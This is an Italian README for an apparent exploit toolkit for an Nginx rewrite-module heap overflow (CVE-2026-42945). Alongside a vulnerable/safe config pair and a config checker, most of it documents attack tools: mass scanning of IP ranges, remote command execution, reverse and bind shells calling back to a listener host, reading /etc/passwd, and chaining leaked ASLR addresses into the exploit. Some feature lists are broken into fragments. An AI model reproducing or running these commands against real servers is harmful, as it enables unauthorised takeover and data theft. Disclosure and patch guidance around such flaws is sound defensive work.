
CVE-2026-42945 Nginx Rift
Un toolkit proof-of-concept completo per CVE-2026-42945 (Nginx Rift), una vulnerabilità critica di heap buffer overflow nel modulo ngx_http_rewrite_module di Nginx.
| Campo | Dettagli |
|---|---|
| ID CVE | CVE-2026-42945 |
| Nome | Nginx Rift |
| Tipo | Heap Buffer Overflow |
| Componente | ngx_http_rewrite_module |
| Gravità | Critica (CVSS 9.2) |
| Versioni interessate | Nginx 0.6.27 - 1.30.0 |
| Versioni corrette | Nginx 1.30.1 / 1.31.0 |
La vulnerabilità è dovuta a un errore di calcolo delle dimensioni tra due passaggi interni durante l'elaborazione delle regole di rewrite. Se una configurazione utilizza:
$1, $2, ecc.)?Nel primo passaggio Nginx calcola erroneamente la dimensione del buffer necessaria e, durante il secondo passaggio, scrive oltre il buffer heap allocato.
server {
# VULNERABLE: Unnamed capture ($1) + '?' in replacement
location /api/ {
rewrite ^/api/(.*)$ /v1/$1?version=2 last;
}
}
server {
# SAFE: Named capture (?P<path>) replaces $1
location /api/ {
rewrite ^/api/(?P<path>.*)$ /v1/$path?version=2 last;
}
}
nginx_rift_poc.py - Strumento PoC PrincipaleScanner di vulnerabilità e strumento di sfruttamento per singolo target.
Caratteristiche:
ServerUtilizzo:
# Detect version and test vulnerability
python nginx_rift_poc.py -t target.example.com
# Test with custom payload
python nginx_rift_poc.py -t target.example.com -p "/api/AAAA...?x=1"
# HTTPS target
python nginx_rift_poc.py -t target.example.com --ssl -p 443
# Generate vulnerable test configuration
python nginx_rift_poc.py --gen-vuln-config > vuln.conf
# Generate safe (patched) configuration
python nginx_rift_poc.py --gen-safe-config > safe.conf
nginx_rift_scanner.py - Scanner di MassaScanner batch per testare più target contemporaneamente.
Caratteristiche:
Utilizzo:
# Scan from target file (format: host:port per line)
python nginx_rift_scanner.py -f targets.txt -o results.json
# Scan single target
python nginx_rift_scanner.py -t example.com -p 443 --ssl
# Scan network range
python nginx_rift_scanner.py -t 192.168.1.0/24 -p 80,443,8080
# High-speed scan
python nginx_rift_scanner.py -f targets.txt --threads 100 -o results.json
Formato del file target:
# Comments start with #
192.168.1.1:80
192.168.1.2:443:ssl
example.com:8080
config_checker.py - Analizzatore di ConfigurazioneAnalizza i file di configurazione Nginx locali per individuare pattern di rewrite vulnerabili.
Caratteristiche:
nginx.conf e segue le direttive include? nelle stringhe di sostituzioneUtilizzo:
# Scan single file
python config_checker.py /etc/nginx/nginx.conf
# Scan directory recursively
python config_checker.py -d /etc/nginx/conf.d/
# Auto-fix vulnerable patterns (creates .bak backup)
python config_checker.py --fix /etc/nginx/nginx.conf
# Auto-detect common Nginx paths
python config_checker.py
enhanced_poc.py - PoC RCE AvanzatoStrumento di exploit avanzato basato sulla ricerca ufficiale di depthfirst, con supporto di più pattern di rewrite e modalità di exploit.
Caratteristiche:
/api/, /redirect/, /user/, ecc.)+, &, =, %)cmd / shell / bind / readngx_pool_cleanup_sUtilizzo:
# Auto-detect patterns and version
python enhanced_poc.py -t target.example.com --detect
# Execute command (ASLR off)
python enhanced_poc.py -t target.example.com --cmd "id > /tmp/pwned"
# Reverse shell
python enhanced_poc.py -t target.example.com --shell --listen-ip 10.0.0.1 --listen-port 4444
# Bind shell
python enhanced_poc.py -t target.example.com --bind --listen-port 5555
# Read remote file
python enhanced_poc.py -t target.example.com --read /etc/passwd
# Custom heap base (for ASLR-off targets)
python enhanced_poc.py -t target.example.com --cmd "whoami" --heap-base 0x555555554000
# Use & as overflow trigger
python enhanced_poc.py -t target.example.com --cmd "id" --escape-char "&"
Dettagli delle Modalità di Exploit:
| Modalità | Descrizione | Output |
|---|---|---|
cmd | Esegue un singolo comando shell | Output del comando sul target |
shell | Avvia una reverse shell | Si riconnette a --listen-ip:listen-port |
bind | Avvia una bind shell sul target | In ascolto su --listen-port sul target |
read | Legge un file dal target | Contenuto scritto in /tmp/nginx_rift_read |
Configurazione degli Indirizzi (solo ASLR disattivo):
--heap-base: Base heap del target (es. 0x555555559000)--libc-base: Indirizzo di base di libc (es. 0x7ffff77ba000)--system-addr: Indirizzo diretto di system() (sostituisce libc-base)aslr_leak_detector.py - Rilevatore di Perdite ASLRScanner completo per rilevare perdite di informazioni in grado di aggirare la protezione ASLR.
Caratteristiche:
/nginx_status, /actuator/*, ecc.)enhanced_poc.py tramite report JSONUtilizzo:
# Scan single target
python aslr_leak_detector.py -t target.example.com
# Scan with SSL
python aslr_leak_detector.py -t target.example.com -p 443 --ssl
# Scan from file, save report
python aslr_leak_detector.py -f targets.txt -p 80,443 -o leak_report.json
# Scan network range
python aslr_leak_detector.py -t 192.168.1.0/24 -p 80,443
# Quick scan mode
python aslr_leak_detector.py -t target.example.com --quick
Integrazione con il PoC Avanzato:
# Step 1: Detect leaks
python aslr_leak_detector.py -t target.example.com -o leak.json
# Step 2: Use leaked addresses for exploit
python enhanced_poc.py -t target.example.com \
--heap-base 0x555555559000 \
--libc-base 0x7ffff77ba000 \
--cmd "id"
Lo strumento PoC identifica la vulnerabilità tramite questi indicatori: